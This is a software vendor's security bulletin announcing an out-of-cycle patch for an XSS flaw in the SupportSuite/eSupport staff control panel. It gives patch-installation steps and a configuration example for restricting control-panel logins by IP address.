Security bulletin – SupportSuite and eSupport

A recent discovery of a potentially exploitable XSS (cross-site scripting) vulnerability inside of the staff control panel means that we have had to release an out-of-cycle patch to our customers.

Who needs to apply the patch

All customers running SupportSuite or eSupport 3.60.04 or earlier need to apply this patch as soon as possible.

About the flaw

The flaw can only be exploited by fully authenticated staff users. However, with cross-site scripting, an attacker could trick your staff users into clicking a legitimate looking link which triggers the exploit and could leak information such as your staff user’s session data and cookie data.

How to apply the patch

You just need to replace on file in your support desk installation.

1. Visit the members’ area, click on the Patches tab.
2. Download the patch file under the “30th September 2009 advisory” that corresponds to your SupportSuite or eSupport version
   1. If you are running a version earlier than 3.11, you will need to perform a full upgrade to 3.60.04 and then apply the patch
3. Extract the ZIP file contents, which contains “functions_ticketsui.php”
4. Upload this file to your support desk installation, replacing the existing file:   ./modules/tickets/functions_ticketsui.php

It is important that all of our customers apply this patch as soon as possible.

If you need assistance applying the patch

Please do not hesitate to get in touch with us – we’ll be happy to help you apply the patch. Visit the members’ area, click on the Get Support tab to submit a support ticket.

Security housekeeping

Control panel IP restrictions

In 3.40.00, we added a feature which allows administrators to restrict which IP addresses can access the staff and administrator control panels. You can specify these IP addresses in the ./config/config.php file, as shown below.

/**
* ENABLE IP RESTRICTION: This option allows you to restrict the admin,staff,winapp,mobile,pda interfaces to a certain IP range
* 202.1.192.0-202.1.192.255: a range of IPs
* 200.36.161.0/24: a range of IP by using net masking
* 200.36.161/24: a shorten syntax similar to the above.
* Example: $_SWIFT['iprestrict'] = array('202.1.192.0-202.1.192.255', '200.36.161.0/24');
*/
$_SWIFT['iprestrict'] = array();

If you are able to isolate logins by IP addresses, we highly recommend you do so, as this means that if one of your staff user’s login details is ever compromised, an attacker will still not be able to login to your control panels from IP addresses other than those you specify.